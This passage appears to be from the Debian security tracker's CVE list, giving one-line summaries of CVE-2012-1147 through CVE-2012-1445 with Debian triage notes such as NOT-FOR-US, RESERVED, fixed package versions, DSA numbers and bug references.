NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1445 (The ELF file parser in eSafe 7.0.17.0, Rising Antivirus 22.83.00.03, ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1444 (The ELF file parser in eSafe 7.0.17.0, Prevx 3.0, Fortinet Antivirus ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1443 (The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, ...) NOTE: clamav, but upstream evaluated it as invalid (#668273) CVE-2012-1442 (The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee ...) NOT-FOR-US: Multiple Antivirus applications CVE-2012-1441 (The Microsoft EXE file parser in eSafe 7.0.17.0 and Prevx 3.0 allows ...) NOT-FOR-US: eSafe, Prevx CVE-2012-1440 (The ELF file parser in Norman Antivirus 6.06.12, eSafe 7.0.17.0, CA ...) NOT-FOR-US: multiple Antivirus applications CVE-2012-1439 (The ELF file parser in eSafe 7.0.17.0, Rising Antivirus 22.83.00.03, ...) NOT-FOR-US: multiple Antivirus applications CVE-2012-1438 (The Microsoft Office file parser in Comodo Antivirus 7425 and Sophos ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1437 (The Microsoft Office file parser in Comodo Antivirus 7425 allows ...) NOT-FOR-US: Comodo Antivirus 7425 CVE-2012-1436 (The Microsoft EXE file parser in AhnLab V3 Internet Security ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1435 (The Microsoft EXE file parser in AhnLab V3 Internet Security ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1434 (The Microsoft EXE file parser in AhnLab V3 Internet Security ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1433 (The Microsoft EXE file parser in AhnLab V3 Internet Security ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1432 (The Microsoft EXE file parser in Emsisoft Anti-Malware 5.1.0.1, eSafe ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1431 (The ELF file parser in Bitdefender 7.2, Command Antivirus 5.2.11.5, ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1430 (The ELF file parser in Bitdefender 7.2, Comodo Antivirus 7424, eSafe ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1429 (The ELF file parser in Bitdefender 7.2, Comodo Antivirus 7424, ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1428 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Norman ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1427 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Norman ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1426 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Command ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1425 (The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK ...) NOT-FOR-US: Multiple Antivirus applications CVE-2012-1424 (The TAR file parser in Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat ...) NOT-FOR-US: multiple Antivirus applications CVE-2012-1423 (The TAR file parser in Command Antivirus 5.2.11.5, Emsisoft ...) NOT-FOR-US: multiple Antivirus applications CVE-2012-1422 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, NOD32 ...) NOT-FOR-US: multiple Antivirus applications CVE-2012-1421 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Norman ...) NOT-FOR-US: multiple Antivirus applications CVE-2012-1420 (The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Command ...) NOT-FOR-US: multiple Antivirus applications CVE-2012-1419 (The TAR file parser in ClamAV 0.96.4 and Quick Heal (aka Cat ...) - clamav 0.97.5+dfsg-1 (low; bug #668273) [squeeze] - clamav 0.97.5+dfsg-3~squeeze1 CVE-2012-1418 (Multiple unspecified vulnerabilities in Google Chrome before ...) NOT-FOR-US: Chrome books CVE-2012-1417 RESERVED CVE-2012-1416 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: SocialCMS CVE-2012-1415 RESERVED CVE-2012-1414 (Cross-site request forgery (CSRF) vulnerability in manager/news.php in ...) NOT-FOR-US: Plume CMS CVE-2012-1413 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Zen Cart CVE-2012-1412 RESERVED CVE-2012-1411 RESERVED CVE-2012-1410 (Multiple cross-site scripting (XSS) vulnerabilities in the History ...) - kadu 0.11.0-1 [squeeze] - kadu (Only affects >= 0.9) CVE-2012-1409 (Unspecified vulnerability in the Tiny Password ...) NOT-FOR-US: Tiny Password CVE-2012-1408 (Unspecified vulnerability in the App Lock (com.cc.applock) application ...) NOT-FOR-US: App Lock CVE-2012-1407 (Unspecified vulnerability in the GO Message Widget ...) NOT-FOR-US: GO Message Widget CVE-2012-1406 (Unspecified vulnerability in the GO Bookmark Widget ...) NOT-FOR-US: GO Bookmark Widget CVE-2012-1405 (Unspecified vulnerability in the GO Note Widget ...) NOT-FOR-US: GO Note Widget CVE-2012-1404 (Unspecified vulnerability in the Dolphin Browser Mini ...) NOT-FOR-US: Dolphin Browser Mini CVE-2012-1403 (Unspecified vulnerability in the Dolphin Browser CN ...) NOT-FOR-US: Dolphin Browser CN CVE-2012-1402 (Unspecified vulnerability in the QianXun YingShi (com.qianxun.yingshi) ...) NOT-FOR-US: QianXun YingShi CVE-2012-1401 (Unspecified vulnerability in the CamScanner (com.intsig.camscanner) ...) NOT-FOR-US: CamScanner CVE-2012-1400 (Unspecified vulnerability in the U+Box 2.0 Pad (lg.uplusbox.pad) ...) NOT-FOR-US: U+Box CVE-2012-1399 (Unspecified vulnerability in the U+Box 2.0 (lg.uplusbox) application ...) NOT-FOR-US: U+Box CVE-2012-1398 (Unspecified vulnerability in the GO WeiboWidget ...) NOT-FOR-US: GO WeiboWidget CVE-2012-1397 (Unspecified vulnerability in the GO QQWeiboWidget ...) NOT-FOR-US: GO QQWeiboWidget CVE-2012-1396 (Unspecified vulnerability in the GO FBWidget ...) NOT-FOR-US: GO FBWidget CVE-2012-1395 (Unspecified vulnerability in the GO TwiWidget ...) NOT-FOR-US: GO TwiWidget CVE-2012-1394 (Unspecified vulnerability in the GO Email Widget ...) NOT-FOR-US: GO Email Widget CVE-2012-1393 (Unspecified vulnerability in the GO SMS Pro (com.jb.gosms) application ...) NOT-FOR-US: GO SMS Pro CVE-2012-1392 (Unspecified vulnerability in the Dolphin Browser HD ...) NOT-FOR-US: Dolphin Browser HD CVE-2012-1391 (Unspecified vulnerability in the mOffice - Outlook sync ...) NOT-FOR-US: mOffice - Outlook sync CVE-2012-1390 (Unspecified vulnerability in the Miso (com.bazaarlabs.miso) ...) NOT-FOR-US: Miso CVE-2012-1389 (Unspecified vulnerability in the Di Long Weibo (com.icekirin.weibos) ...) NOT-FOR-US: Di Long Weibo CVE-2012-1388 (Unspecified vulnerability in the XiXunTianTian (com.xixun.tiantian) ...) NOT-FOR-US: XiXunTianTian CVE-2012-1387 (Unspecified vulnerability in the RealTalk (com.tmsmanager.tms) ...) NOT-FOR-US: RealTalk CVE-2012-1386 (Unspecified vulnerability in the YouMail Visual Voicemail Plus ...) NOT-FOR-US: YouMail Visual Voicemail Plus CVE-2012-1385 (Unspecified vulnerability in the NetEase WeiboHD (com.netease.wbhd) ...) NOT-FOR-US: NetEase WeiboHD CVE-2012-1384 (Unspecified vulnerability in the NetEase Pmail (com.netease.rpmms) ...) NOT-FOR-US: NetEase Pmail CVE-2012-1383 (Unspecified vulnerability in the NetEase Reader (com.netease.pris) ...) NOT-FOR-US: NetEase Reader CVE-2012-1382 (Unspecified vulnerability in the Youdao Dictionary (com.youdao.dict) ...) NOT-FOR-US: Youdao Dictionary CVE-2012-1381 (Unspecified vulnerability in the NetEase CloudAlbum ...) NOT-FOR-US: NetEase CloudAlbum CVE-2012-1380 (Unspecified vulnerability in the NetEaseWeibo (com.netease.wb) ...) NOT-FOR-US: NetEaseWeibo CVE-2012-1379 RESERVED CVE-2012-1378 RESERVED CVE-2012-1377 RESERVED CVE-2012-1376 RESERVED CVE-2012-1375 RESERVED CVE-2012-1374 RESERVED CVE-2012-1373 RESERVED CVE-2012-1372 RESERVED CVE-2012-1371 RESERVED CVE-2012-1370 (Cisco AnyConnect Secure Mobility Client 3.0 before 3.0.08057 allows ...) NOT-FOR-US: Cisco CVE-2012-1369 RESERVED CVE-2012-1368 RESERVED CVE-2012-1367 (The MallocLite implementation in Cisco IOS 12.0, 12.2, 15.0, 15.1, and ...) NOT-FOR-US: Cisco CVE-2012-1366 RESERVED CVE-2012-1365 (Cisco Unified Computing System (UCS) 1.4 and 2.0 allows remote ...) NOT-FOR-US: Cisco CVE-2012-1364 (Cisco Unified Computing System (UCS) 1.4 and 2.0 allows remote ...) NOT-FOR-US: Cisco CVE-2012-1363 RESERVED CVE-2012-1362 RESERVED CVE-2012-1361 (Cisco IOS 15.1 and 15.2, when the Multicast Music-on-Hold (MMoH) ...) NOT-FOR-US: Cisco CVE-2012-1360 RESERVED CVE-2012-1359 RESERVED CVE-2012-1358 RESERVED CVE-2012-1357 (The igmp_snoop_orib_fill_source_update function in the IGMP process in ...) NOT-FOR-US: NX-OS CVE-2012-1356 RESERVED CVE-2012-1355 RESERVED CVE-2012-1354 RESERVED CVE-2012-1353 RESERVED CVE-2012-1352 RESERVED CVE-2012-1351 RESERVED CVE-2012-1350 (Cisco IOS 12.3 and 12.4 on Aironet access points allows remote ...) NOT-FOR-US: Cisco IOS CVE-2012-1349 RESERVED CVE-2012-1348 (Cisco Wide Area Application Services (WAAS) appliances with software ...) NOT-FOR-US: Cisco Wide Area Application Services CVE-2012-1347 RESERVED CVE-2012-1346 (Cisco Emergency Responder 8.6 and 9.2 allows remote attackers to cause ...) NOT-FOR-US: Cisco Emergency Responder CVE-2012-1345 RESERVED CVE-2012-1344 (Cisco IOS 15.1 and 15.2, when a clientless SSL VPN is configured, ...) NOT-FOR-US: Cisco IOS CVE-2012-1343 RESERVED CVE-2012-1342 (Cisco Carrier Routing System (CRS) 3.9, 4.0, and 4.1 allows remote ...) NOT-FOR-US: Cisco Carrier Routing System CVE-2012-1341 RESERVED CVE-2012-1340 (The Fibre Channel over IP (FCIP) implementation in Cisco MDS NX-OS 4.2 ...) NOT-FOR-US: Cisco MDS NX-OS CVE-2012-1339 (The Fabric Interconnect component in Cisco Unified Computing System ...) NOT-FOR-US: Cisco Unified Computing System CVE-2012-1338 (Cisco IOS 15.0 and 15.1 on Catalyst 3560 and 3750 series switches ...) NOT-FOR-US: Cisco IOS CVE-2012-1337 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L ...) NOT-FOR-US: Cisco WebEx CVE-2012-1336 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L ...) NOT-FOR-US: Cisco WebEx CVE-2012-1335 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L ...) NOT-FOR-US: Cisco WebEx CVE-2012-1334 RESERVED CVE-2012-1333 RESERVED CVE-2012-1332 RESERVED CVE-2012-1331 RESERVED CVE-2012-1330 RESERVED CVE-2012-1329 RESERVED CVE-2012-1328 (Cisco Unified IP Phones 9900 series devices with firmware 9.1 and 9.2 ...) NOT-FOR-US: Cisco IP Phone CVE-2012-1327 (dot11t/t_if_dot11_hal_ath.c in Cisco IOS 12.3, 12.4, 15.0, and 15.1 ...) NOT-FOR-US: Cisco IOS CVE-2012-1326 RESERVED CVE-2012-1325 RESERVED CVE-2012-1324 (Race condition in the Zone-Based Firewall in Cisco IOS 15.1 and 15.2, ...) NOT-FOR-US: Cisco IOS CVE-2012-1323 RESERVED CVE-2012-1322 RESERVED CVE-2012-1321 RESERVED CVE-2012-1320 RESERVED CVE-2012-1319 RESERVED CVE-2012-1318 RESERVED CVE-2012-1317 RESERVED CVE-2012-1316 RESERVED CVE-2012-1315 (Memory leak in the SIP inspection feature in the Zone-Based Firewall ...) NOT-FOR-US: Cisco IOS CVE-2012-1314 (The WAAS Express feature in Cisco IOS 15.1 and 15.2 allows remote ...) NOT-FOR-US: Cisco IOS CVE-2012-1313 RESERVED CVE-2012-1312 (The MACE feature in Cisco IOS 15.1 and 15.2 allows remote attackers to ...) NOT-FOR-US: Cisco IOS CVE-2012-1311 (The RSVP feature in Cisco IOS 15.0 and 15.1 and IOS XE 3.2.xS through ...) NOT-FOR-US: Cisco IOS CVE-2012-1310 (Memory leak in the Zone-Based Firewall in Cisco IOS 12.4, 15.0, 15.1, ...) NOT-FOR-US: Cisco IOS CVE-2012-1309 RESERVED CVE-2012-1308 (Cross-site request forgery (CSRF) vulnerability in redpass.cgi in ...) NOT-FOR-US: D-Link CVE-2012-1307 RESERVED CVE-2012-1306 RESERVED CVE-2012-1305 RESERVED CVE-2012-1304 RESERVED CVE-2012-1303 RESERVED CVE-2012-1302 RESERVED CVE-2012-1301 RESERVED NOT-FOR-US: Umbraco CVE-2012-1300 RESERVED CVE-2012-1299 RESERVED CVE-2012-1298 RESERVED CVE-2012-1297 (Multiple cross-site request forgery (CSRF) vulnerabilities in main.php ...) NOT-FOR-US: Contao CVE-2012-1296 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Elefant CMS CVE-2012-1295 RESERVED CVE-2012-1294 (SQL injection vulnerability in CONTIMEX Impulsio CMS allows remote ...) NOT-FOR-US: CONTIMEX Impulsio CMS CVE-2012-1292 (Unspecified vulnerability in the MessagingSystem servlet in SAP ...) NOT-FOR-US: SAP NetWeaver CVE-2012-1291 (Unspecified vulnerability in the ...) NOT-FOR-US: SAP NetWeaver CVE-2012-1290 (Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp ...) NOT-FOR-US: SAP NetWeaver CVE-2012-1289 (Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 ...) NOT-FOR-US: SAP NetWeaver CVE-2012-1293 (Multiple cross-site scripting (XSS) vulnerabilities in fup in Frams' ...) {DSA-2414-1} - fex 20120215-1 (low; bug #660621) CVE-2012-1288 (The UTC Fire & Security GE-MC100-NTP/GPS-ZB Master Clock device uses ...) NOT-FOR-US: UTC Fire & Security GE-MC100-NTP/GPS-ZB Master Clock CVE-2012-1287 RESERVED CVE-2012-1286 RESERVED CVE-2012-1285 RESERVED CVE-2012-1284 RESERVED CVE-2012-1283 RESERVED CVE-2012-1282 RESERVED CVE-2012-1281 RESERVED CVE-2012-1280 RESERVED CVE-2012-1279 RESERVED CVE-2012-1278 RESERVED CVE-2012-1277 RESERVED CVE-2012-1276 RESERVED CVE-2012-1275 RESERVED CVE-2012-1274 RESERVED CVE-2012-1273 RESERVED CVE-2012-1272 RESERVED CVE-2012-1271 RESERVED CVE-2012-1270 RESERVED CVE-2012-1269 RESERVED CVE-2012-1268 RESERVED CVE-2012-1267 RESERVED CVE-2012-1266 RESERVED CVE-2012-1265 RESERVED CVE-2012-1264 (Unspecified vulnerability in Gretech GOM Media Player before ...) NOT-FOR-US: Gretech GOM Media Player CVE-2012-1263 RESERVED CVE-2012-1262 (Cross-site scripting (XSS) vulnerability in cgi-bin/mt/mt-wizard.cgi ...) {DSA-2423-1} - movabletype-opensource 5.1.3+dfsg-1 CVE-2012-1261 RESERVED CVE-2012-1260 RESERVED CVE-2012-1259 RESERVED CVE-2012-1258 RESERVED CVE-2012-1257 RESERVED - pidgin (unimportant) NOTE: Negligable local information disclosure CVE-2012-1256 (The single sign-on (SSO) implementation in EasyVista before ...) NOT-FOR-US: EasyVista CVE-2012-1255 (SQL injection vulnerability in Segue 2.2.10.2 and earlier allows ...) NOT-FOR-US: Segue (CMS) CVE-2012-1254 (Cross-site scripting (XSS) vulnerability in Segue 2.2.10.2 and earlier ...) NOT-FOR-US: Segue (CMS) CVE-2012-1253 (Cross-site scripting (XSS) vulnerability in Roundcube Webmail before ...) - roundcube 0.7-1 CVE-2012-1252 (Cross-site scripting (XSS) vulnerability in RSSOwl before 2.1.1 allows ...) - rssowl (bug #346541) CVE-2012-1251 (Opera before 9.63 does not properly verify X.509 certificates from SSL ...) NOT-FOR-US: Opera CVE-2012-1250 (Logitec LAN-W300N/R routers with firmware before 2.27 do not properly ...) NOT-FOR-US: Logitec LAN-W300N/R device CVE-2012-1249 (The iLunascape application 1.0.4.0 and earlier for Android does not ...) NOT-FOR-US: iLunascape CVE-2012-1248 (app/config/core.php in baserCMS 1.6.15 and earlier does not properly ...) NOT-FOR-US: BaserCMS CVE-2012-1247 (Cross-site scripting (XSS) vulnerability in KENT-WEB WEB MART 1.7 and ...) NOT-FOR-US: KENT-WEB WEB MART CVE-2012-1246 (Cross-site scripting (XSS) vulnerability in KENT-WEB WEB MART 1.7 and ...) NOT-FOR-US: KENT-WEB WEB MART CVE-2012-1245 (Cross-site scripting (XSS) vulnerability in the cleanup_urls function ...) NOT-FOR-US: OSQA CVE-2012-1244 (The NTT DOCOMO sp mode mail application 5400 and earlier for Android ...) NOT-FOR-US: Android app CVE-2012-1243 (The TwitRocker2 application before 1.0.23 for Android does not ...) NOT-FOR-US: Android app CVE-2012-1242 (Untrusted search path vulnerability in JustSystems Ichitaro 2011 Sou, ...) NOT-FOR-US: various Ichitaro products CVE-2012-1241 (GRScript18.dll before 1.2.2.0 in ActiveScriptRuby (ASR) before 1.8.7 ...) NOT-FOR-US: ActiveScriptRuby CVE-2012-1240 (Cross-site scripting (XSS) vulnerability in the RECRUIT Dokodemo ...) NOT-FOR-US: RECRUIT Dokodemo CVE-2012-1239 (The TopAccess web-based management interface on TOSHIBA TEC e-Studio ...) NOT-FOR-US: TOSHIBA TEC e-Studio CVE-2012-1238 (Session fixation vulnerability in SENCHA SNS before 1.0.2 allows ...) NOT-FOR-US: SENCHA SNS CVE-2012-1237 (Cross-site request forgery (CSRF) vulnerability in SENCHA SNS before ...) NOT-FOR-US: SENCHA SNS CVE-2012-1236 (Multiple cross-site request forgery (CSRF) vulnerabilities in Janetter ...) NOT-FOR-US: Janetter CVE-2012-1235 (Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin ...) NOT-FOR-US: Advantech/BroadWin WebAccess CVE-2012-1234 (SQL injection vulnerability in Advantech/BroadWin WebAccess 7.0 allows ...) NOT-FOR-US: Advantech/BroadWin WebAccess CVE-2012-1233 RESERVED CVE-2012-1232 RESERVED CVE-2012-1231 RESERVED CVE-2012-1230 RESERVED CVE-2012-1229 RESERVED CVE-2012-1228 RESERVED CVE-2012-1227 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: pluck CVE-2012-1226 (Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 ...) - dolibarr (bug #634783) CVE-2012-1225 (Multiple SQL injection vulnerabilities in Dolibarr CMS 3.2.0 Alpha and ...) - dolibarr (bug #634783) CVE-2012-1224 (Cross-site scripting (XSS) vulnerability in system/classes/login.php ...) NOT-FOR-US: ContentLion Alpha CVE-2012-1223 (RabidHamster R2/Extreme 1.65 and earlier uses a small search space of ...) NOT-FOR-US: RabidHamster CVE-2012-1222 (Stack-based buffer overflow in RabidHamster R2/Extreme 1.65 and ...) NOT-FOR-US: RabidHamster CVE-2012-1221 (Directory traversal vulnerability in the telnet server in RabidHamster ...) NOT-FOR-US: RabidHamster CVE-2012-1220 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: GAzie CVE-2012-1219 (Multiple cross-site scripting (XSS) vulnerabilities in freelancerKit ...) NOT-FOR-US: freelancerKit CVE-2012-1218 (Multiple SQL injection vulnerabilities in freelancerKit 2.35 allow ...) NOT-FOR-US: freelancerKit CVE-2012-1217 (Multiple cross-site scripting (XSS) vulnerabilities in STHS v2 Web ...) NOT-FOR-US: STHS CVE-2012-1216 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: PBBoard CVE-2012-1215 (Cross-site scripting (XSS) vulnerability in the Add friends module in ...) NOT-FOR-US: Yoono extension CVE-2012-1214 (Cross-site scripting (XSS) vulnerability in the Add friends module in ...) NOT-FOR-US: Yoono Desktop Application CVE-2012-1213 (Cross-site scripting (XSS) vulnerability in zimbra/h/calendar in ...) NOT-FOR-US: Zimbra Web Client CVE-2012-1212 (Cross-site scripting (XSS) vulnerability in the smwfOnSfSetTargetName ...) NOT-FOR-US: Semantic Enterprise Wiki CVE-2012-1211 (Cross-site scripting (XSS) vulnerability in pfile/kommentar.php in ...) NOT-FOR-US: Powie pFile CVE-2012-1210 (SQL injection vulnerability in pfile/file.php in Powie pFile 1.02 ...) NOT-FOR-US: Powie pFile CVE-2012-1209 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Fork CMS CVE-2012-1208 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Fork CMS CVE-2012-1207 (Directory traversal vulnerability in ...) NOT-FOR-US: Fork CMS CVE-2012-1206 (Multiple integer overflows in Hancom Office 2010 SE 8.5.5 allow remote ...) NOT-FOR-US: Hancom Office CVE-2012-1205 (PHP remote file inclusion vulnerability in relocate-upload.php in ...) NOT-FOR-US: Relocate Upload plugin CVE-2012-1204 RESERVED CVE-2012-1203 RESERVED CVE-2012-1202 RESERVED CVE-2012-1201 RESERVED CVE-2012-1200 (Multiple PHP remote file inclusion vulnerabilities in Nova CMS allow ...) NOT-FOR-US: Nova CMS CVE-2012-1199 (Multiple PHP remote file inclusion vulnerabilities in Basic Analysis ...) - acidbase (low) [squeeze] - acidbase (Minor issue) CVE-2012-1198 (base_ag_main.php in Basic Analysis and Security Engine (BASE) 1.4.5 ...) - acidbase (low; bug #661020) [squeeze] - acidbase (Minor issue) CVE-2012-1197 (Integer overflow in the IDE_ACDStd.apl module for ACDSee 14.1 Build ...) NOT-FOR-US: ACDSee CVE-2012-1196 (Directory traversal vulnerability in the VulCore web service ...) NOT-FOR-US: Lenovo ThinkManagement Console CVE-2012-1195 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: Lenovo ThinkManagement Console CVE-2012-1194 (The resolver in the DNS Server service in Microsoft Windows Server ...) NOTE: DNS protocol flaw CVE-2012-1193 (The resolver in PowerDNS Recursor (aka pdns_recursor) 3.3 overwrites ...) NOTE: DNS protocol flaw CVE-2012-1192 (The resolver in Unbound before 1.4.11 overwrites cached server names ...) NOTE: DNS protocol flaw CVE-2012-1191 (The resolver in dnscache in Daniel J. Bernstein djbdns 1.05 overwrites ...) - djbdns NOTE: DNS protocol flaw NOTE: RH made an update: https://bugzilla.redhat.com/show_bug.cgi?id=838761 CVE-2011-5081 (Cross-site scripting (XSS) vulnerability in RestoreFile.pm in BackupPC ...) - backuppc 3.1.0-9.1 (low; bug #661011) [squeeze] - backuppc 3.1.0-9.1 [lenny] - backuppc (Minor issue) CVE-2012-0869 (Cross-site scripting (XSS) vulnerability in fup in Frams' Fast File ...) {DSA-2414-1} - fex 20120215-1 (low; bug #660621) CVE-2012-1190 (Cross-site scripting (XSS) vulnerability in the replication-setup ...) - phpmyadmin 4:3.4.10.1-1 (unimportant) [lenny] - phpmyadmin [squeeze] - phpmyadmin NOTE: hypothetical issue CVE-2012-1189 (Stack-based buffer overflow in modules/graphic/ssgraph/grsound.cpp in ...) - torcs 1.3.3-1 (low; bug #660555) [squeeze] - torcs (Minor issue) - speed-dreams (bug #599884) CVE-2012-1188 (Multiple cross-site scripting (XSS) vulnerabilities in Fork CMS before ...) NOT-FOR-US: Fork CMS CVE-2012-1187 RESERVED - bitlbee 3.0.4+bzr855-1 (low) [squeeze] - bitlbee (Minor issue) CVE-2012-1186 (Integer overflow in the SyncImageProfiles function in profile.c in ...) {DSA-2462-1} - imagemagick 8:6.6.9.7-7 (bug #665007) CVE-2012-1185 (Multiple integer overflows in (1) magick/profile.c or (2) ...) {DSA-2462-1} - imagemagick 8:6.6.9.7-7 (bug #665007) CVE-2012-1184 (Stack-based buffer overflow in the ast_parse_digest function in ...) - asterisk 1:1.8.10.0~dfsg-1 (bug #664411) [squeeze] - asterisk (HTTP digest authentication code not present) NOTE: http://www.openwall.com/lists/oss-security/2012/03/16/10 CVE-2012-1183 (Stack-based buffer overflow in the milliwatt_generate function in the ...) {DSA-2460-1} - asterisk 1:1.8.10.0~dfsg-1 (bug #664411) NOTE: http://www.openwall.com/lists/oss-security/2012/03/16/10 CVE-2012-1182 (The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before ...) {DSA-2450-1} - samba 2:3.6.4-1 (bug #668309) - samba4 4.0.0~alpha19+dfsg1-1 (bug #668309) CVE-2012-1181 (fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP ...) {DSA-2436-1} - libapache2-mod-fcgid 1:2.3.6-1.1 (bug #615814) CVE-2012-1180 (Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before ...) {DSA-2434-1} - nginx 1.1.17-1 (bug #664137) NOTE: http://seclists.org/oss-sec/2012/q1/644 CVE-2012-1179 (The Linux kernel before 3.3.1, when KVM is used, allows guest OS users ...) - linux-2.6 3.2.14-1 [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2012-1178 (The msn_oim_report_to_user function in oim.c in the MSN protocol ...) - pidgin 2.10.2-1 (low; bug #664030) [squeeze] - pidgin (Only exploitable by malicious server) NOTE: http://pidgin.im/news/security/?id=61 CVE-2012-1177 (libgdata before 0.10.2 and 0.11.x before 0.11.1 does not validate SSL ...) {DSA-2482-1} - libgdata 0.10.2-1 (bug #664032) NOTE: http://www.openwall.com/lists/oss-security/2012/03/14/3 CVE-2012-1176 (Buffer overflow in the fribidi_utf8_to_unicode function in PyFriBidi ...) - pyfribidi 0.11.0-1 (bug #663189) [squeeze] - pyfribidi (Minor issue) CVE-2012-1175 (Integer overflow in the GnashImage::size method in ...) {DSA-2435-1} - gnash 0.8.10-5 (bug #664023) NOTE: http://www.openwall.com/lists/oss-security/2012/03/14/5 CVE-2012-1174 (The rm_rf_children function in util.c in the systemd-logind login ...) - systemd 44-1 (bug #664364) CVE-2012-1173 (Multiple integer overflows in tiff_getimage.c in LibTIFF 3.9.4 allow ...) {DSA-2447-1} - tiff3 3.9.6-2 - tiff 4.0.1-2 CVE-2012-1172 (The file-upload implementation in rfc1867.c in PHP before 5.4.0 does ...) {DSA-2465-1} - php5 5.4.0-1 (bug #663760) CVE-2012-1171 [safemode bypass after RSHUTDOWN] RESERVED - php5 (unimportant) NOTE: according to php's security statement, safemode bypass issues are not treated as security-relevant CVE-2012-1170 RESERVED - moodle (Only affects 2.2) CVE-2012-1169 RESERVED - moodle (Only affects 2.0 to 2.2) CVE-2012-1168 RESERVED - moodle (Only affects 2.0 to 2.2) CVE-2012-1167 (The JBoss Server in JBoss Enterprise Application Platform 5.1.x before ...) - jbossas4 (Only builds a few libraries, not the full application server) CVE-2012-1166 [ldm (LTSP display manager)] RESERVED - ldm 2:2.2.7-1 (bug #663645) [squeeze] - ldm (Introduced in 2.2) NOTE: https://bugs.launchpad.net/ubuntu/+source/ldm/+bug/953340 CVE-2012-1165 (The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL ...) {DSA-2454-1} - openssl 1.0.0h-1 (low; bug #663642) NOTE: http://www.openwall.com/lists/oss-security/2012/03/12/3 CVE-2012-1164 (slapd in OpenLDAP before 2.4.30 allows remote attackers to cause a ...) - openldap 2.4.31-1 (low; bug #663644) [squeeze] - openldap (Minor issue) NOTE: http://www.openwall.com/lists/oss-security/2012/03/12/4 CVE-2012-1163 (Integer overflow in the _zip_readcdir function in zip_open.c in libzip ...) - libzip 0.10.1-1 (bug #664990) CVE-2012-1162 (Heap-based buffer overflow in the _zip_readcdir function in zip_open.c ...) - libzip 0.10.1-1 (bug #664990) CVE-2012-1161 RESERVED - moodle (Only affects 2.1 to 2.2) CVE-2012-1160 RESERVED - moodle (Only affects 2.1 to 2.2) CVE-2012-1159 RESERVED - moodle (Only affects 2.1 to 2.2) CVE-2012-1158 RESERVED - moodle (Only affects 2.1 to 2.2) CVE-2012-1157 RESERVED - moodle (Only affects 2.0 to 2.2) CVE-2012-1156 RESERVED - moodle (Only affects 2.0 to 2.2) CVE-2012-1155 RESERVED - moodle 1.9.9.dfsg2-6 (low; bug #668411) [squeeze] - moodle 1.9.9.dfsg2-2.1+squeeze4 CVE-2012-1154 (mod_cluster 1.0.10 before 1.0.10 CP03 and 1.1.x before 1.1.4, as used ...) NOT-FOR-US: mod_cluster CVE-2012-1153 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: AppRain CMS, not in Debian CVE-2012-1152 (Multiple format string vulnerabilities in the error reporting ...) {DSA-2432-1} - libyaml-libyaml-perl 0.38-2 (bug #661548) CVE-2012-1151 (Multiple format string vulnerabilities in dbdimp.c in DBD::Pg (aka ...) {DSA-2431-1} - libdbd-pg-perl 2.19.0-1 (bug #661536) CVE-2012-1150 (Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x ...) - python2.5 (low) - python2.6 2.6.8-0.1 (low) - python2.7 2.7.3~rc1-1 (low) - python3.2 3.2.3-1 (low) - python3.1 (low) [squeeze] - python2.5 (Minor issue) [squeeze] - python2.6 (Minor issue) [squeeze] - python3.1 (Minor issue) CVE-2012-1149 (Integer overflow in the vclmi.dll module in OpenOffice.org (OOo) 3.3, ...) {DSA-2487-1 DSA-2473-1} - libreoffice 1:3.4.5-1 - openoffice.org 1:3.3.0-1 NOTE: Since 3.3.0 openoffice.org is a transitional source package to migrate to libreoffice CVE-2012-1148 (Memory leak in the poolGrow function in expat/lib/xmlparse.c in expat ...) {DSA-2525-1} - xmlrpc-c 1.16.33-3.2 (low; bug #687672) [squeeze] - xmlrpc-c (Minor issue) - expat 2.1.0~beta3-1 (bug #663579) CVE-2012-1147 (readfilemap.c in expat before 2.1.0 allows context-dependent attackers ...) - expat 